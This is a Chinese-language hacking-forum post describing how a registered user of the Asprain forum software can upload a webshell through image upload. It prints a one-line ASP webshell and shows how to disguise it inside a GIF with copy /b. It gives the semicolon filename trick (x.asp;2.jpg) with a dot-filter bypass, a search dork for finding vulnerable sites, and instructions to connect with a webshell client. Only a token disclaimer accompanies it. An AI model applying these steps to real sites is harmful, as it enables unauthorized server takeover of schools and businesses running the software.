Asprain论坛 注册用户 上传图片就可拿到webshell
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛，一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。 

请大家别用于非法用途此漏洞收集于网络。 

1.txt存放你的一句话马 如：<%execute(request(“cmd”))%> 

2.gif 为一小图片文件，一定要小，比如qq表情图片
3:copy /b 2.gif+1.txt 

3.gif 这样就伪造了文件头，但是现在传上去还不行，我接下来就用 

4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了 

5.q.asp;.gif
6.本人在测试的时候发现上传x.asp;2.jpg或者 x.asp;2.jpg的时候出现如下情况。

6.谷歌搜索关键字:Powered by Asprain 或者 “Powered by Asprain” 由于最近谷歌在中国访问访问 大家可以使用 

谷歌翻墙搜索 谷歌翻墙搜索 http://soso.exehack.net

详细请看: 谷歌在华遭遇干扰本站启动谷歌翻墙搜索 http://www.exehack.net/27.html

上传后的文件名为：2014-6-8/1asp;2.jpg 这里把1后面的点过滤点了无法正常解析

PS：修复方法 直接在1的后面多加几个0 修改后的文件名为1….asp;2.jpg 发现可以正常解析。

上传后的地址为 uploadpic/2014-6-8/1…asp;2.jpg  直接在网站域名后面加上地址即可用菜刀连接

(原创文章转载请注明 www.exehack.net)